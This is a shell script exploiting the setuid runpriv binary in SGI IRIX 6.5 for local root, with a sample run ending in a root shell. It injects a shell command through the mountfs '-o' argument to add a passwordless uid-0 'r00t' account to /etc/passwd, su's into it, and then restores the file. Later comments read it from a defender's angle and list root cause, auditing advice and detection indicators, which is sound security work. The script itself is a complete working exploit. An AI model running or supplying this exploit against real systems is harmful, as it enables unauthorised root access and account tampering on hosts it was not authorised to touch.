#!/bin/sh
# SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit
# =======================================================
# 'runpriv' checks to see if you have been granted privilege,
# and if so it runs the command privilege found in the
# directory /usr/sysadm/privbin with the remaining arguments.
#
# 'runpriv' is a suid root binary in a default installation
# of IRIX 6.5, runpriv does not filter shell escape sequences
# before passing them as arguements to privileges and allows
# for the executing of arbitrary commands as root by authorised
# users. This exploit assumes the user has the mountfs privilege
# which can be enabled by root with the following command.
#
# "/usr/sysadm/bin/addpriv user mountfs"
#
# Example.
# -bash-2.05b$ id
# uid=16071(user) gid=20(user)
# -bash-2.05b$ uname -a
# IRIX64 IRIS 6.5 04101931 IP30
# -bash-2.05b$ ./xrunpriv.sh
# [ SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit
# [ Creating cleanup and shell scripts
# [ game over
# # id
# uid=0(root) gid=0(sys)
#
# - prdelka
#
# NOTE(review): reading of this proof of concept from the defender's side.
#
# Root cause as the script demonstrates it: the value handed to the
# mountfs privilege via '-o' starts with a literal '|' followed by a
# 'ksh -c' command line, and that value reaches a shell context with
# root privileges.  The practical consequence is that, on an unpatched
# host, any privilege granted with addpriv is root-equivalent for the
# grantee; treat the sysadm privilege list that way when auditing it,
# and apply the vendor fix for runpriv (reference: <VENDOR-ADVISORY-ID
# placeholder>; not given on this page) before relying on addpriv as a
# least-privilege mechanism.
#
# Detection points that follow directly from the commands below:
#   * a setuid runpriv process whose argument vector contains shell
#     metacharacters ('|', quotes, 'ksh -c') -- process accounting or
#     audit of privileged execs will show it;
#   * a new uid-0 entry named 'r00t' appended to /etc/passwd, and an
#     'su r00t' by an ordinary user;
#   * the fixed paths /tmp/passwd123 and /tmp/rootcmd.sh, which are
#     literal indicators for this script.
# Because the script snapshots /etc/passwd first and restores it from
# inside the root shell, the extra account exists only for a short
# window; a periodic diff of /etc/passwd can miss it, so real-time
# file-integrity monitoring or audit logging of su/passwd changes is
# what actually catches this.

echo [ SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit
echo [ Creating cleanup and shell scripts

# Fixed, world-writable temp names: another local user who pre-creates
# or symlinks these paths can interfere with the backup/restore below,
# and the names are easy to alert on.
rm -rf /tmp/passwd123
rm -rf /tmp/rootcmd.sh

# Snapshot of the current /etc/passwd; restored by /tmp/rootcmd.sh once
# the root shell is obtained, so the injected account does not persist.
cp /etc/passwd /tmp/passwd123

# Script that the root shell will run: restore passwd (content, mode,
# ownership), remove itself, then hand over an interactive /bin/sh.
echo "#!/bin/sh" >> /tmp/rootcmd.sh
echo "mv /tmp/passwd123 /etc/passwd" >> /tmp/rootcmd.sh
echo "chmod 644 /etc/passwd" >> /tmp/rootcmd.sh
echo "chown root:sys /etc/passwd" >> /tmp/rootcmd.sh
echo "rm -rf /tmp/rootcmd.sh" >> /tmp/rootcmd.sh
echo "/bin/sh" >> /tmp/rootcmd.sh
chmod +x /tmp/rootcmd.sh

# The vulnerable call: the '-o' value beginning with '|' is the shell
# escape the header describes; the command it carries appends a
# passwordless uid-0 'r00t' entry to /etc/passwd as root.
/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"

echo [ game over

# Switch to the injected account; this only succeeds where an empty
# password field is honoured by su, as the transcript above shows on
# the author's host -- behaviour elsewhere is not established here.
su r00t -c /tmp/rootcmd.sh

# Final cleanup; by now rootcmd.sh has normally already moved the
# backup back over /etc/passwd and deleted itself.
rm -rf /tmp/passwd123
rm -rf /tmp/rootcmd.sh